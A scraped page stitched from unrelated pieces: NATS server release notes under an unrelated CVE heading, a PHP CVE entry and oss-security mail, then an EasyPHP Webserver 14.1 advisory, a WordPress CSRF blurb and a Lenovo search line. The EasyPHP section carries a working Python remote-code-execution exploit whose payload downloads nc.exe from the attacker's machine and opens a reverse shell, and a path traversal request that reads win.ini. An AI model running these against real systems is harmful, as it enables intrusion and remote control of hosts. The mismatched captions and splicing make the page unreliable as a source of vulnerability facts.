*   Fix FirstSeq not being updated with filestore when purging subject (#4041). Thanks for the contribution @MauriceVanVeen!
*   Fix Raft log debug reloading (#4047)
*   Ensure consumer recovers fully on restart before being eligible for leader (#4049)
*   Fix incorrect check between stream source/mirror with external streams (#4052)
*   Fix various conditions during Raft group recovery (#4056, #4058)

**Complete Changes**

v2.9.15...v2.9.16

**Release v2.9.15**

**Changelog****Go Version**

*   1.19.6: Both the release executables and Docker images are built with this Go release

**Added**

*   Monitoring
    *   Add raft query parameter to /jsz to include group info (#3915)
    *   Update /leafz to include leaf node remove server name and “spoke” flag (#3923, #3925)

**Changed**

*   Lower default value of jetstream.max_outstanding_catchup to prevent slow consumers between routes (#3922)
    *   **Note: The new value is now 64MB from 128MB. This is better optimized for 1 Gbit links, however if your links are 10 Gbit or higher, this value can be set back to 128MB if slow consumers were not previously observed.**

**Improved**

*   Refactor intra-process queue to reduce allocations (#3894)
*   JetStream
    *   Better system stability and recovery from corrupt metadata due to hard forced restarts (#3934)
    *   Optimize on-disk, per-subject info update (#3867)
    *   Limit concurrent blocking IO to improve stability under heavy IO loads (#3867)
    *   Improve message expiry calculation for large numbers of messages (#3867)
    *   Optimize when and how consumer num pending is calculated, significantly speeding up consumer info requests (#3877)
    *   Improve parallel consumer creation to prevent dropped messages (#3880)
    *   Properly warn on consumer state update state failures (#3892)
    *   Performance of consumer creation for certain configurations (#3901)
    *   Send current snapshot to followers when becoming meta-leader (#3904)
    *   Ensure preferred peer during stepdown is healthy (#3905)
    *   Optimized various store calls on stream state (#3910)
    *   Various performance and stability under heavy IO loads (#3922) (Thank you @matkam and @davidzhao for the report and the test harness!)

**Fixed**

*   Fix stack overflow panic in reverse entry check when inbox ends with wildcard (#3862)
*   Check if client connection name was already set when storing, preventing recursive memory growth (#3886)
*   Fix check for count of wildcard tokens in “partition” subject transform (#3887) (Thank you @MauriceVanVeen for the contribution!)
*   Fix panic if service export is nil (#3917) (Thank you @MauriceVanVeen for the report!)
*   JetStream
    *   Ensure per-subject info is updated when doing stream compact (#3860)
    *   Ensure account usage is updated in the filestore when extended version purge occurs (#3876)
    *   Prevent consumer deletes on restart, with non-fatal errors (#3881)
    *   Do not warn if consumer replicas is zero since it will be inherited from the stream (#3882)
    *   Named push consumers with inactive thresholds deleted when still active (#3884)
    *   Prevent spurious “Error storing entry to WAL” log messages (#3893, #3891)
    *   Clean up consumer redelivery state on stream purge (#3892)
    *   Clean up consumer ack pending if below stream ack floor (#3892)
    *   Update ack floors on messages being expired (#3892)
    *   Fix lost ack pending consumer state on partial stream purge (#3892)
    *   Snapshot and compact the consumer RAFT WAL, even when state changes do not occur, to prevent excessive disk usage (#3898)
    *   Fix KV accounting errors under heavy concurrent usage (#3900)
    *   Ensure new replicas respect MaxAge when a stream is scaled up (#3861)
    *   Snapshots would not compact after being applied (#3907)
    *   Fix filtered pending state calculation (#3910)
    *   Recover from a failed truncate on raft WAL (#3911)
    *   Fix JWT claims update if headers are passed (#3918)
*   MQTT
    *   Prevent use of wildcard characters with topics beginning with $, per the MQTT spec violation 4.7.2-1 (#3926) (Thank you @dominikh for the report!)

**Dependency Updates**

*   klauspost/compress - v1.16.0
*   nats-io/nats.go - v1.24.0
*   golang.org/x/crypto - v0.6.0
*   golang.org/x/sys - v0.5.0

**Complete Changes**

v2.9.14...v2.9.15

**Release v2.9.14**

**Changelog****Go Version**

*   1.19.5: Both the release executables and Docker images are built with this Go release

**Fixed**

*   JetStream
    *   Fix circumstance when an empty snapshot could be written (#3844)
    *   Fix possible panic and deadlock during a consumer filter subject update (#3845)
    *   Fix consumer snapshot logic (#3846)

**Complete Changes**

v2.9.12...v2.9.14

**Release v2.9.12**

**Changelog**

**NOTE: regressions were found in this release. Please skip this and go directly to the v2.9.14 release.**

**Go Version**

*   1.19.5: Both the release executables and Docker images are built with this Go release

**Added**

*   OS/Arch
    *   Add support for dragonfly BSD (#3804)

**Improved**

*   JetStream
    *   Use highwayhash to optimize difference tracking for stream, consumer, and cluster snapshots (#3780)
    *   Add small tolerance in lag for stream and consumer health checks (#3794)
    *   Various optimizations related to snapshots and memory usage (#3828, #3831, #3837) Thanks to @MauriceVanVeen for the collaboration on this issue.

**Fixed**

*   JetStream
    *   Update numCores and maxProcs if altered by container limits (#3796)
    *   Fix filtered state for all subjects when the first sequences are deleted (#3801)
    *   Updating a stream to direct gets would fail direct gets (#3806)
    *   Force consumer replicas to match for interest-based policy streams (#3817)
    *   Assign signal subscription to consumer when created (#3808)
    *   Properly process updates on a stream on restart (#3818)
    *   Select consumer peer(s) from active/online peers only on creation (#3821)
    *   Sourced streams that do not overlap subjects were incorrectly reported as a cycle (#3825)
    *   Fix for isGroupLeaderless when JS not available due to shutdown (#3830)
    *   Deadlock on data loss when holding mb lock (#3832)
    *   Fix consumer not getting messages after filter update (#3829)
    *   Fix current consumers not getting messages after purge (#3838) Thanks to @pcsegal for the report!

**Updated Dependencies**

*   github.com/klauspost/compress - v1.15.15
*   github.com/nats-io/nats.go - v1.23.0
*   golang.org/x/time - v0.3.0

**Complete Changes**

v2.9.11...v2.9.12

CVE-2022-28357: Releases · nats-io/nats-server

** DISPUTED ** main/streams/plain_wrapper.c in PHP 5.3.x before 5.3.1 does not recognize the safe_mode_include_dir directive, which allows context-dependent attackers to have an unknown impact by triggering the failure of PHP scripts that perform include or require operations, as demonstrated by a script that attempts to perform a require_once on a file in a standard library directory. NOTE: a reliable third party reports that this is not a vulnerability, because it results in a more restrictive security policy.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 20 Nov 2009 11:41:50 +0100
From: Thomas Biege <thomas@...e.de>
To: OSS-Security Mailinglist <oss-security@...ts.openwall.com>
Subject: CVE request: php 5.3.1 update

Hello,

PHP was updated to version 5.3.1 and did also address security
issues: http://www.php.net/releases/5\_3\_1.php

Security Enhancements and Fixes in PHP 5.3.1:

    \* Added "max\_file\_uploads" INI directive, which can be set to limit the number of file uploads per-request to 20 by default, to prevent possible DOS via temporary file exhaustion.
    \* Added missing sanity checks around exif processing.
    \* Fixed a safe\_mode bypass in tempnam().
    \* Fixed a open\_basedir bypass in posix\_mkfifo().
    \* Fixed bug #50063 (safe\_mode\_include\_dir fails).
    \* Fixed bug #44683 (popen crashes when an invalid mode is passed).


-- 
Bye,
     Thomas
-- 
 Thomas Biege <thomas@...e.de>, SUSE LINUX, Security Support & Auditing
 SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
-- 
  Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
                            -- Marie von Ebner-Eschenbach

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2009-3559: security - CVE request: php 5.3.1 update

EasyPHP Webserver version 14.1 suffers from remote code execution and path traversal vulnerabilities.

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on:  Windows 7 and 10

# Vulnerability Type: Remote Command Execution (RCE)

CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78

Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.

Proof of concept:

To detect:

POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000

app_service_control=calc.exe

The calculator opens.

Exploit:

# !/usr/bin/python3  
import requests  
import sys

if len(sys.argv) != 5:  
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
    exit(1)

else:  
    target = sys.argv[1]  
    targetport = sys.argv[2]  
    localip = sys.argv[3]  
    localport = sys.argv[4]  
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory

    payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
    print (payload)  
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
    headers = {  
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
    }  
    data = {'app_service_control':payload}

    try:  
        r = requests.post(url, headers=headers, data=data)  
    except requests.exceptions.ReadTimeout:  
        print("The payload has been sent. Check it!")  
        pass

# Vulnerability Type: Path Traversal

CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22

Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.

Proof of concept:

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499

; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder plugin <= 3.6.0 at WordPress allows uploading the JSON file and updating the options. Requires Import and Export add-on.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us